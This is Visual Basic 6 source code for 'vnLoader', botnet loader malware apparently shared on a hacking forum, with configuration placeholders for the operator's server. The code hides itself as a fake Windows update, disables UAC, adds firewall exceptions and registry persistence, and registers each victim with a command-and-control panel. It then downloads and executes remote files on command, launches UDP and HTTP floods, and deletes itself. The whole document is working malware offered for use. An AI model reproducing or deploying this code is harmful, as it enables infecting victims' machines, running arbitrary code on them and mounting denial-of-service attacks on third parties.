VERSION 5.00
Begin VB.Form Form1 
   BorderStyle     =   0  'None
   Caption         =   "Form1"
   ClientHeight    =   750
   ClientLeft      =   7200
   ClientTop       =   5655
   ClientWidth     =   1365
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   MaxButton       =   0   'False
   MinButton       =   0   'False
   ScaleHeight     =   750
   ScaleWidth      =   1365
   ShowInTaskbar   =   0   'False
   Visible         =   0   'False
   Begin VB.Timer HTTP 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   360
      Top             =   240
   End
   Begin VB.Timer UDP 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   720
      Top             =   240
   End
   Begin VB.ListBox didList 
      Height          =   255
      Left            =   240
      TabIndex        =   1
      Top             =   0
      Width           =   255
   End
   Begin VB.Timer RefreshTimer 
      Left            =   0
      Top             =   240
   End
   Begin VB.ListBox cmdList 
      Height          =   255
      Left            =   0
      TabIndex        =   0
      Top             =   0
      Width           =   255
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'
' vnLoader - coded by van1lle from Hackforums.net
'
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Declare Function CreateMutex Lib "kernel32" Alias "CreateMutexA" (lpMutexAttributes As Any, ByVal bInitialOwner As Long, ByVal lpName As String) As Long
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private Version
Private Server
Private Port
Private Prefix
Private Password
Private Mutex
Private StartUp
Private RefreshMinutes
Private TempMinutes

Private Install
Private InstallDir
Private InstallName

Public LocalTime As String
Public TimeDiff As Long
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private Commands        As String
Private Result          As String
Private ID              As String
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private HTTP_IP         As String
Private HTTP_SOCKETS    As String
Private HTTP_PAGE       As String
Private HTTP_TIME       As String
Private HTTP_STARTTIME  As String
Private HTTP_STATE      As Boolean
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Private UDP_IP          As String
Private UDP_TIME        As String
Private UDP_STARTTIME   As String
Private UDP_STATE       As Boolean
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dim WithEvents Socket       As CSocketPlus
Attribute Socket.VB_VarHelpID = -1
Dim WithEvents SocketLog    As CSocketPlus
Attribute SocketLog.VB_VarHelpID = -1

Private Sub Form_Load()
    Call UAC_Disabler

    '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Server = "someserver.com"               'Your Domain (without: "http://" or "www.")
    Prefix = "/vnLoader/"                   'Path to the folder of the webpanel
    Password = "password"                   'Password for the update command
    Mutex = "nV578vMKrjK7i9J"               'Mutex
    StartUp = "Windows Live Messenger"      'Startupkey
    Port = "80"
    Version = "1"
        
    RefreshMinutes = 5
    TempMinutes = 0
        
    Install = True
    
    If IsUserAdmin Then
        InstallDir = Environ$("systemroot") & "\WindowsUpdate"
    Else
        InstallDir = Environ$("appdata") & "\WindowsUpdate"
    End If

    InstallName = "\MSUpdate.exe"
    '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Form1.Visible = False
    App.TaskVisible = False

    'Variables
    Dim hMutex As Long
    
    'End if more than 1 instance
    hMutex = CreateMutex(ByVal 0&, 1, Mutex)
    If (Err.LastDllError = 183&) Then
        End
    End If
    
    'Randomize
    Randomize
        
    'Installing
    Call InstallEXE(Install)
    
    'Check if me is the installed one
    If Not App.Path & "\" & App.EXEName & ".exe" = InstallDir & InstallName Then
        Call StartTheRightOne
    End If
    
    'SetID
    Call SetID
    
    'Initialize Socket
    Set Socket = New CSocketPlus
    Set SocketLog = New CSocketPlus
       
    'Make Socket
    If Socket.ArrayIndexInUse(0) = False Then
        Socket.ArrayAdd (0)
    End If
        
    'Make SocketLog
    If SocketLog.ArrayIndexInUse(0) = False Then
        SocketLog.ArrayAdd (0)
    End If
                
    'UDP and HTTP
    UDP_STATE = False
    HTTP_STATE = False

    'Set Refreshtimer Interval
    RefreshTimer.Interval = 60000
        
    Call Connect
End Sub

Private Sub Connect()
    'Reset
    Commands = ""
    
    'Set Socket variables
    Socket.RemoteHost(0) = Server
    Socket.RemotePort(0) = Port
    Socket.Connect (0)
    
    'Set SocketLog variables
    SocketLog.RemoteHost(0) = Server
    SocketLog.RemotePort(0) = Port
End Sub

Private Sub Socket_CloseSck(ByVal Index As Variant)
    'Variables
    Dim HelperA() As String
    Dim HelperB() As String
    Dim HelperC() As String
    Dim i As Integer
    'Analyze Webrespond
    HelperA() = Split(Commands, vbCrLf & vbCrLf)
    HelperB() = Split(HelperA(1), vbCrLf)
    If UBound(HelperB) >= 1 Then
        HelperC() = Split(HelperB(1), "<br>")
        For i = 0 To UBound(HelperC) - 1
            cmdList.AddItem HelperC(i)
        Next i
    End If
    
    'Execute Commands
    Call Execute_Commands
End Sub

Private Sub Socket_Connect(ByVal Index As Variant)
    'Variables
    Dim CMD_PACKET As String
    
    'Command Packet
    CMD_PACKET = "GET " & Prefix & "bot/command.php?id=" & ID & "&os=" & GetOS & "&ver=" & Version & " HTTP/1.1" & vbCrLf & _
                 "Host: " & Server & vbCrLf & _
                 "Connection: close" & _
                 vbCrLf & vbCrLf
    
    'Send Webrequest
    If Socket.State(0) = sckConnected Then
        Socket.SendData (0), CMD_PACKET
    End If
End Sub

Private Sub Socket_DataArrival(ByVal Index As Variant, ByVal bytesTotal As Long)
    'Variables
    Dim Source As String
        
    'Get Webrespond
    Socket.GetData (0), Source
    Commands = Commands & Source
End Sub

Private Sub RefreshTimer_Timer()
    TempMinutes = TempMinutes + 1

    If TempMinutes = RefreshMinutes Then
        'Clear Listbox
        cmdList.Clear
    
        'Close Sockets
        Socket.CloseSck (0)
        SocketLog.CloseSck (0)
        
        'Reset TempMinutes
        TempMinutes = 0
        
        'Start getting Commands
        Call Connect
    End If
End Sub

Private Sub Execute_Commands()
    'Variables
    Dim i As Integer
    Dim RandomName As String
    Dim RemTime As String
    
    'Go through every row in the listbox
    For i = 0 To cmdList.ListCount - 1

        If cmdList.List(i) Like "1*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Download & Execute
            If CommandDid(cmdList.List(i)) = False Then
                RandomName = Int(Rnd * 1000000000)
                            
                If Not URLDownloadToFile(0, Replace(cmdList.List(i), "1#", ""), Environ$("TEMP") & "\" & RandomName & ".exe", 0, 0) Then
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] File successfully downloaded: " & Replace(cmdList.List(i), "1#", ""))
                Else
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Failed to download File: " & Replace(cmdList.List(i), "1#", ""))
                End If
                
                If ShellExecute(Me.hwnd, "open", Environ$("TEMP") & "\" & RandomName & ".exe", "", "", 0) Then
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] File successfully executed: " & Replace(cmdList.List(i), "1#", ""))
                Else
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Failed to execute File: " & Replace(cmdList.List(i), "1#", ""))
                End If
                
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "2*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Update
            If CommandDid(cmdList.List(i)) = False Then
                RandomName = Int(Rnd * 1000000000)
                
                If Split(Replace(cmdList.List(i), "2#", ""), "|")(1) = Password Then
                    Call URLDownloadToFile(0, Split(Replace(cmdList.List(i), "2#", ""), "|")(0), Environ$("TEMP") & "\" & RandomName & ".exe", 0, 0)
                    If ShellExecute(Me.hwnd, "open", Environ$("TEMP") & "\" & RandomName & ".exe", "", "", 0) Then
                        Call Remove
                    End If
                End If
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "3*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Remove
            If CommandDid(cmdList.List(i)) = False Then
                
                If Replace(cmdList.List(i), "3#", "") = Password Then
                    Call Remove
                End If
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "4*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Browse Website
            If CommandDid(cmdList.List(i)) = False Then
                If Browse_Website(cmdList.List(i)) = 42 Then
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Website successfully browsed: " & Replace(cmdList.List(i), "4#", ""))
                Else
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Failed to browse Website: " & Replace(cmdList.List(i), "4#", ""))
                End If
                
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "5*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Visit Website
            If CommandDid(cmdList.List(i)) = False Then
                If Visit_Website(cmdList.List(i)) = 42 Then
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Website successfully visited: " & Replace(cmdList.List(i), "5#", ""))
                Else
                    SetResult ("[" & RemoteTime & " GMT|" & ID & "] Failed to visit Website: " & Replace(cmdList.List(i), "5#", ""))
                End If
                
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "6*" Then
            'MSN-Spread
        ElseIf cmdList.List(i) Like "7*" Then
            'Xfire-Spread
        ElseIf cmdList.List(i) Like "8*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'UDP Flood
            If CommandDid(cmdList.List(i)) = False Then
                If Not UDP_STATE Then
                    UDP_IP = Split(Replace(cmdList.List(i), "8#", ""), "|")(0)
                    UDP_TIME = Split(Replace(cmdList.List(i), "8#", ""), "|")(1)
                    UDP.Enabled = True
                End If
                
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "9*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'HTTP Flood
            If CommandDid(cmdList.List(i)) = False Then
                If Not HTTP_STATE Then
                    HTTP_IP = Split(Replace(cmdList.List(i), "9#", ""), "|")(0)
                    HTTP_TIME = Split(Replace(cmdList.List(i), "9#", ""), "|")(1)
                    HTTP_SOCKETS = Split(Replace(cmdList.List(i), "9#", ""), "|")(2)
                    HTTP_PAGE = Split(Replace(cmdList.List(i), "9#", ""), "|")(3)
                    HTTP.Enabled = True
                End If
                
                didList.AddItem cmdList.List(i)
            End If
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        ElseIf cmdList.List(i) Like "A*" Then
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            'Get Time Difference
            RemTime = Replace(cmdList.List(i), "A#", "")
            TimeDiff = DateDiff("s", Date & " " & Time, RemTime)
            '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        End If
        
    Next i
    
    If Not Result = "" Then
        SocketLog.Connect (0)
    End If
    
    Call DelCommands
End Sub

Private Sub SocketLog_CloseSck(ByVal Index As Variant)
    'Reset Logresults
    Result = ""
End Sub

Private Sub SocketLog_Connect(ByVal Index As Variant)
    'Variables
    Dim CMD_PACKET As String
    'Command Packet
    CMD_PACKET = "GET " & Prefix & "bot/log.php?id=" & Replace(Result, " ", "+") & " HTTP/1.1" & vbCrLf & _
                 "Host: " & Server & vbCrLf & _
                 "Connection: close" & _
                 vbCrLf & vbCrLf
    
    'Send Webrequest
    If SocketLog.State(0) = sckConnected Then
        SocketLog.SendData (0), CMD_PACKET
    End If
End Sub

'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Commands
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Private Function Remove()
    Shell "cmd /c REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v """ & StartUp & """ /f", vbHide
    Shell "cmd /c REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v """ & StartUp & """ /f", vbHide
    DeleteSetting "Microsoft"
    Call Melt
End Function

Private Sub HTTP_Timer()
    'HTTP active
    HTTP_STATE = True
    'Respond
    SetResult ("[" & RemoteTime & " GMT|" & ID & "] HTTP-Flood started at: " & HTTP_IP & " with " & HTTP_SOCKETS & " Connections, until " & HTTP_TIME & " GMT")
    'Call the Flood
    Call HTTP_Flood(HTTP_IP, HTTP_SOCKETS, HTTP_TIME, HTTP_PAGE)
    'HTTP inactive
    HTTP_STATE = False
    'Disable timer
    HTTP.Enabled = False
End Sub

Private Sub UDP_Timer()
    'UDP active
    UDP_STATE = True
    'Respond
    SetResult ("[" & RemoteTime & " GMT|" & ID & "] UDP-Flood started at: " & UDP_IP & " until " & UDP_TIME & " GMT")
    'Call the Flood
    Call UDP_Flood(UDP_IP, UDP_TIME)
    'UDP inactive
    UDP_STATE = False
    'Disable timer
    UDP.Enabled = False
End Sub

Private Function Browse_Website(ByVal Command As String)
    'Variables
    Dim Website() As String
    
    'Split Command
    Website = Split(Command, "#")
    
    'View Website
    Browse_Website = ShellExecute(Me.hwnd, "open", Website(1), "", "", 1)
End Function

Private Function Visit_Website(ByVal Command As String)
    'Variables
    Dim Website() As String
    
    'Split Command
    Website = Split(Command, "#")
    
    'View Website
    Visit_Website = ShellExecute(Me.hwnd, "open", "iexplore.exe", Website(1), "", 0)
End Function

Private Function InstallEXE(ByVal Install As Boolean)
    On Error Resume Next
    If Install Then
        If Not FolderExists(InstallDir) Then
            MkDir (InstallDir)
        End If
        FileCopy App.Path & "\" & App.EXEName & ".exe", InstallDir & InstallName
        Call UAC
        Call FirewallException(App.Path & "\" & App.EXEName & ".exe")
        Call FirewallException(InstallDir & InstallName)
        Call Reg(StartUp, InstallDir & InstallName)
    End If
End Function

'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Miscellaneous
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Private Function GetOS()
    'Variables
    Dim SQL As String
    Dim OS As String
    Dim WMI As Object
    Dim System As Variant

    'Get Operating System
    SQL = "SELECT * FROM Win32_OperatingSystem"
    Set WMI = GetObject("winmgmts:").ExecQuery(SQL)
    For Each System In WMI
        OS = System.Caption
    Next
    OS = Replace(OS, "Microsoft ", "")
    GetOS = Replace(OS, " ", "%20")
End Function

Private Function CommandDid(ByVal Command As String)
    'Variables
    Dim i As Integer
    
    CommandDid = False
    
    'Go through the list
    For i = 0 To didList.ListCount - 1
        If Command = didList.List(i) Then CommandDid = True
    Next i
End Function

Private Function DelCommands()
    'Variables
    Dim Delete As Boolean
    Dim i As Integer
    Dim j As Integer

    'Check every entry in didList
    For i = didList.ListCount - 1 To 0 Step -1
        Delete = True
        
        'Check every entry in cmdList
        For j = 0 To cmdList.ListCount - 1
            'If exist dont delete
            If didList.List(i) = cmdList.List(i) Then Delete = False
        Next j
        
        If Delete = True Then
            'Delete
            didList.RemoveItem (i)
        End If
    Next i
End Function

Private Function SetResult(ByVal Text As String)
    'Save Results
    Result = Result & Text & "<br>"
End Function

Private Function SetID()
    'Variables
    Dim i As Integer

    'Get ID if exists
    ID = GetSetting("Microsoft", "ID", "ID", "")
    
    If ID = "" Then
        'Set unique ID for the victim

        For i = 1 To 4
            ID = ID & Hex(Random(16, 254))
        Next i

        SaveSetting "Microsoft", "ID", "ID", ID
        
        SetResult ("[" & RemoteTime & " GMT|" & ID & "] New Infection")
    End If
End Function

Private Function FolderExists(ByVal Path As String) As Boolean
    If Right$(Path, 1) <> "\" Then Path = Path & "\"
    FolderExists = (UCase$(Dir$(Path & "\nul")) = "NUL")
End Function

Private Function Reg(ByVal name As String, ByVal Path As String)
    Shell "cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v """ & name & """ /t REG_SZ /d """ & Path & """ /f", vbHide
    Shell "cmd /c REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v """ & name & """ /t REG_SZ /d """ & Path & """ /f", vbHide
End Function

Private Function FirewallException(ByVal Path As String)
    Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""DoNotAllowExceptions"" /t REG_DWORD /d ""0"" /f", vbHide
    Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v """ & Path & """ /t REG_SZ /d """ & Path & ":*:Enabled: " & StartUp & """ /f", vbHide
End Function

Private Function UAC()
    Shell "cmd /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ""EnableLUA"" /t REG_DWORD /d ""0"" /f", vbHide
    Shell "cmd /c REG ADD ""HKLM\SOFTWARE\Microsoft\Security Center"" /v ""UACDisableNotify"" /t REG_DWORD /d ""0"" /f", vbHide
End Function

Private Function Melt()
    Open Environ$("TEMP") & "\3849567956796.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "ping 127.0.0.1 -n 3 >nul"
    Print #1, "del """ & InstallDir & InstallName & ".exe"""
    Print #1, "del %0"
    Close #1
    Shell Environ$("TEMP") & "\3849567956796.bat", vbHide
    End
End Function

Private Function StartTheRightOne()
    Open Environ$("TEMP") & "\3892358092376.bat" For Output As #1
    Print #1, "@echo off"
    Print #1, "ping 127.0.0.1 -n 3 >nul"
    Print #1, "" & InstallDir & InstallName & ""
    Print #1, "del %0"
    Close #1
    Shell Environ$("TEMP") & "\3892358092376.bat", vbHide
    End
End Function

Public Function Random(ByVal Lowerbound As Long, ByVal Upperbound As Long)
    Randomize
    Random = Int(Rnd * Upperbound) + Lowerbound
End Function

Public Function IsUserAdmin() As Boolean
  Dim oGroup As Object
  Dim oMember As Object
  Dim sUserName As String
  On Error GoTo ErrHandler
  sUserName = Environ$("USERNAME")
  Set oGroup = GetObject("WinNT://./Administratoren,group")
  For Each oMember In oGroup.Members
    If oMember.name = sUserName Then
      IsUserAdmin = True
      Exit For
    End If
  Next
ErrHandler:
  IsUserAdmin = False
  Set oMember = Nothing
  Set oGroup = Nothing
End Function

Public Function RemoteTime()
    RemoteTime = DateAdd("s", TimeDiff, Date & " " & Time)
End Function
